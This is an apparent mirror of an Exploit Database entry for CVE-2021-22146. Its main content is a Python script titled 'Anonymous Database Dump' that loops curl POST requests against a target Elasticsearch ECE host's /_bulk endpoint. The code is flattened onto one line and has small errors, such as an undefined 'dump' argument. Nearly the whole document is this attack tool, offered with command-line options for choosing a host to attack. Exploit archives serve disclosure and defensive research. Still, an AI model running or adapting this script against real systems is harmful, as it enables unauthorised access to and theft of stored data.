Elasticsearch ECE 7.13.3 – Anonymous Database Dump

• Exploit Database
• 115 阅读

• 作者： Joan Martinez
  日期： 2021-07-26
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50152/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66

  # Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump # Date: 2021-07-21 # Exploit Author: Joan Martinez @magichk # Vendor Homepage: https://www.elastic.co/ # Software Link: https://www.elastic.co/ # Version: >= 7.10.0 to <= 7.13.3 # Tested on: Elastic ECE (Cloud) # CVE : CVE-2021-22146 # Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180   import os import argparse import sys   ######### Check Arguments def checkArgs(): parser = argparse.ArgumentParser() parser = argparse.ArgumentParser(description=&apos;Elasticdump 1.0\n&apos;) parser.add_argument(&apos;-s&apos;, "--host", action="store", dest=&apos;host&apos;, help="Host to attack.") parser.add_argument(&apos;-p&apos;, "--port", action="store", dest=&apos;port&apos;, help="Elastic search port by default 9200 or 9201") parser.add_argument(&apos;-i&apos;, "--index", action="store", dest=&apos;index&apos;, help="Index to dump (Example: 30)")     args = parser.parse_args() if (len(sys.argv)==1) or (args.host==False) or (args.port==False) or (args.index==False and arg.dump==False) : parser.print_help(sys.stderr) sys.exit(1) return args   def banner(): print("_ _ _ _") print("___| | __ _ ___| |_(_) ___ __| |_ _ _ __ ____ __") print(" / _ \ |/ _<code> / __| __| |/ __/ _</code> | | | | &apos;_ ` _ \| &apos;_ \ ") print("|__/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |") print(" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/") print(" |_|")       def exploit(host,port,index):   if (index != 0): final = int(index) else: final = 1000000000   cont = 0 while (cont <= final): os.system("curl -X POST \""+host+":"+port+"/_bulk\" -H &apos;Content-Type: application/x-ndjson&apos; --data-binary $&apos;{\x0d\x0a\"index\":{\x0d\x0a \"_id\" :\""+str(cont)+"\"\x0d\x0a}\x0d\x0a}\x0d\x0a&apos; -k -s") cont = cont + 1   if __name__ == "__main__":   banner() args = checkArgs() if (args.index): exploit(args.host,args.port,args.index) else: exploit(args.host,args.port,0)